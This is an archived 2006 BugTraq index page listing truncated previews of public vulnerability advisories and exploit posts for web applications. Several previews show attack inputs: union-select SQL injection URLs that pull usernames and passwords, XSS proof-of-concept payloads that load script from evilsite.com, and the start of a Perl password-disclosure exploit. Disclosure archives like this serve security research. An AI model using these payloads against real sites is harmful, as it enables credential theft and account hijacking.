BugTraq Mode:
(Page 1129 of 1748)  < Prev  1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134  Next >
file include in Xtreme Downloads v.1.0 2006-06-05
gamr-14 hotmail com
Multiple file include exploits in Xtreme Downloads v.1.0

script type : Xtreme Downloads v.1.0

bug found by : sweet-devil

team : site-down

type : file include

####################################################

exploits :

download.php

http://www.example.com/path/download.php?ro

[ more ]  [ reply ]
Re: Multiple Vendor NTFS Data Stream Malware Stealth Technique 2006-06-05
Andreas Marx (gega-it web de)
Hi,

besides the fact that it is always a good idea to notify vendors which might be affected *in advance* before releasing information like this, it's indeed nothing new.

You can find a more comprehensive review of AV products here:
<http://www.heise.de/security/artikel/52139/2>

This list should

[ more ]  [ reply ]
Re: PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn 2006-06-04
k reznichak pcpin com
The patch has been released. Refer to http://www.pcpin.com for information.

[ more ]  [ reply ]
ASPScriptz Guest Book 2.0 XSS 2006-06-05
omnipresent email it
------------------------------------------------------------------

- ASPScriptz Guest Book 2.0 Remote XSS -

-= http://colander.altervista.org/advisory/ASzGB.txt =-

------------------------------------------------------------------

-= ASPScriptz Guest Book 2.0 =-

O

[ more ]  [ reply ]
[KAPDA::#47] - myNewsletter 1.1.2 SQL_Injection 2006-06-05
farhadkey yahoo com
[KAPDA::#47] - myNewsletter 1.1.2 SQL_Injection

SQL_Injection

-------

KAPDA New advisory

Vulnerable products : myNewsletter <= 1.1.2

Vendor: http://www.aspburst.com/index.asp

Risk: Medium

Vulnerability: SQL_Injection

Date :

--------------------

Found : 2006/06/05

Vendor Contacte

[ more ]  [ reply ]
[Kil13r-SA-20060606] ESTsoft InternetDISK Arbitary Code Execution Vulnerability 2006-06-05
mac68k gmail com
Title:

[Kil13r-SA-20060606] ESTsoft InternetDISK Arbitary Code Execution Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Remote

Timeline:

2006/04/19 - Discovery

2006/04/19 - Vendor notification

2006/04/20 - Vendor response

2006/04/20 - Vendor patch release

200

[ more ]  [ reply ]
[Kil13r-SA-20060605] Syworks SafeNET Policy File Vulnerability 2006-06-05
mac68k gmail com
Title:

[Kil13r-SA-20060605] Syworks SafeNET Policy File Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Local

Timeline:

2006/04/18 - Discovery

2006/06/05 - Release

Affected version:

All versions of Syworks SafeNET

Not affected version:

At this time, none

[ more ]  [ reply ]
Dmx Forum <= v2.1a Remote Passwords Disclosure 2006-06-05
gmdarkfig gmail com
#!/usr/bin/perl

#

# by DarkFig -- www.acid-root.new.fr

#

use LWP::Simple;

if ( !$ARGV[1] ) {

header();

print "\n| Usage: <url> <member_id> ----------------|";

print "\n+------------------------------------------+";

print "\n| Example: http://localhost/dmx/ 1 ------|";

end();

}

sub

[ more ]  [ reply ]
[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability 2006-06-05
admin majorsecurity de
[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability

-------------------------------------------------------------------------

Software: HostAdmin

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamco

[ more ]  [ reply ]
Personal Information Disclosure/Account Hijacking Vulnerability in mafia online games 2006-06-05
Ulrich Keil (securityfocus der-keiler de)
The mafia online games www.mafia1930.de, www.mafia1930.com and
www.the-mafia.de operated by e-sport GmbH are popular online
applications with over 400.000 accounts.
Although the basic game is free, many people upgrade to premium
accounts and invest real money to get special features.

An attacker is

[ more ]  [ reply ]
[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability 2006-06-05
admin majorsecurity de
[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

-------------------------------------------------------------------------

Software: DreamAccount

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://d

[ more ]  [ reply ]
Re: [Full Disclosure] [Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability 2006-06-05
mac68k gmail com
Title:

[Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Both

Timeline:

2003/12/28 - Discovery

2006/05/20 - Release

2006/06/05 - Update

Affected version:

Microsoft Internet Explorer 6 SP2 or earlier

Not

[ more ]  [ reply ]
Advisory 04/2006: DokuWiki PHP code execution vulnerability in spellchecker 2006-06-05
Stefan Esser (sesser hardened-php net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hardened-PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: DokuWiki PHP code execution vulnerability in spellchecker
Release Date: 2006/06/05
Last Modified

[ more ]  [ reply ]
NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability 2006-06-05
ajannhwt hotmail com
# Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

# Author : ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,

[ more ]  [ reply ]
FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit 2006-06-05
ajannhwt hotmail com
# Title : FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit

# Author : ajann

REMOTE USER PASS CHANGE EXPLOIT;

Change: <input type="hidden" name="uid" value="1"> => ID AND action

***********************************************************************************

[ more ]  [ reply ]
LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability 2006-06-05
ajannhwt hotmail com
# Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

# Author : ajann

#Vulnerability;

$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT

$$$ Example:

http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0

[ more ]  [ reply ]
TSLSA-2006-0032 - multi 2006-06-05
Trustix Security Advisor (tsl trustix org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Trustix Secure Linux Security Advisory #2006-0032

Package names: kernel, postgresql
Summary: Multiple vulnerabilities
Date: 2006-06-05
Affected versi

[ more ]  [ reply ]
Kmita FAQ v1.0 2006-06-05
luny youfucktard com
Kmita FAQ v1.0

Homepage:

http://www.kmita-faq.com

Affected files:

search.php

index.php

Search.php does not sanitize user input before dynamically generating it.

Proof of concept:

http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

SQL Injection pr

[ more ]  [ reply ]
LabWiki v1.0 2006-06-05
luny youfucktard com
LabWiki 1.0

Homepage:

http://www.bioinformatics.org/phplabware/labwiki/index.php

Affected files:

search.php

The search input box does not sanitize user input before dynamically generating it.

XSS Proof of concept:

"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"

[ more ]  [ reply ]
CyBoards PHP Lite v1.25 (common.PHP) Remote File Inclusion 2006-06-04
SpC-x Bsdmail Org
######################################################

# CyBoards PHP Lite v1.25 (common.PHP) Remote File Inclusion

######################################################

# Credit : SpC-x | The-BeKiR

# Site : http://wWw.SaVSaK.CoM

######################################################

[ more ]  [ reply ]
Re: [Full-disclosure] bug in oscomerce 2006-06-04
Frank Laszlo (laszlof vonostingroup com)
this would require access to the administrator panel to work, how is
this a vuln?

zeus olimpusklan wrote:
> ###########################################################################
> #Advisory #2 Title: file Modification in osCommerce
> #
> #
> # Author: 0o_zeus_o0
> # Contact: zeus@diosdelared

[ more ]  [ reply ]
# MHG Security Team ---Rumble 1.02 version Remote File Inc. 2006-06-04
MSN : erne [at] ernealizm [dot] com (beceriksiz1986 hotmail com)
# Milli-Harekat Advisory ( www.milli-harekat.org )

# Rumble <= 1.02 version - Remote File Include Vulnerabilities

# Risk : high

# Class: Remote

# Script : Rumble 1.02 version

# Msn : erne [at] ernealizm [dot] com

# Credits : ERNE

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,Blackened,Poizonbox

[ more ]  [ reply ]
# MHG Security Team ---Rumble 1.02 version Remote File Inc. 2006-06-04
erne ernealizm com
# Milli-Harekat Advisory ( www.milli-harekat.org )

# Rumble <= 1.02 version - Remote File Include Vulnerabilities

# Risk : high

# Class: Remote

# Script : Rumble 1.02 version

# Msn : erne [at] ernealizm [dot] com

# Credits : ERNE

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,Black

[ more ]  [ reply ]
Bookmark4U Remote File Include 2006-06-04
selfar2002 hotmail com (1 replies)


---------------------------------------------------------------------------

Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By SnIpEr_SA

Author : SnIpEr_SA

Remote : Yes

L

[ more ]  [ reply ]
Re: Bookmark4U Remote File Include 2006-06-05
str0ke (str0ke milw0rm com)
Copyright 2010, SecurityFocus